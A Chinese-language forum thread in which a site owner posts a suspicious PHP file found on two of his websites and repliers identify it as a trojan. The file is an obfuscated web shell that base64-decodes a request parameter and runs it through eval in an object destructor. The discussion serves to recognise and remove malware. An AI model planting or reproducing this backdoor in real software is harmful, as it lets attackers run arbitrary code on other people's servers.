共计 879 个字符,预计需要花费 3 分钟才能阅读完成。
还请懂个老哥解惑下,两个站都有类似的文件;<?phpclass tb3abe{ public $base64; function __construct() { $this->/*b1688a027dd4d8f1d*/base64/*d505aa2a7eff*/=$_REQUEST[\’white\’]; } function __toString() { return /*a8cc97610c62df*/base64_decode/*99013d759*/($this->base64); }}class f4d59f554e217{ protected $e=null; function __construct() { $this->e = new tb3abe(); } function __destruct() { /*8c0a6173cd9e3866c85b0bc1e8*/@eval/*0929963467231de36ce*/($this->e); }}$one = new f4d59f554e217();?> juniko 2022-12-07 16:14 2 必然是木马了,先 base64 解码,再调用 eval 函数 Alook 2022-12-07 16:16 3juniko 发表于 2022-12-7 16:14 必然是木马了,先 base64 解码,再调用 eval 函数是不是调了 eval 函数的大部分都是木马,正常程序一般都不允许用这个函数吧,太危险了 luckmc 2022-12-07 16:18 4juniko 发表于 2022-12-7 16:14 必然是木马了,先 base64 解码,再调用 eval 函数多谢老哥,我先删了?能详细说下吗。我看不懂? juniko 2022-12-07 16:19 5Alook 发表于 2022-12-7 16:16 是不是调了 eval 函数的大部分都是木马,正常程序一般都不允许用这个函数吧,太危险了 … 正常也有用这个函数的,特别是一些缓存之类的。说危险这个函数估计能排前几了 920 2022-12-07 17:04 6 有 eval 这个函数 99% 是了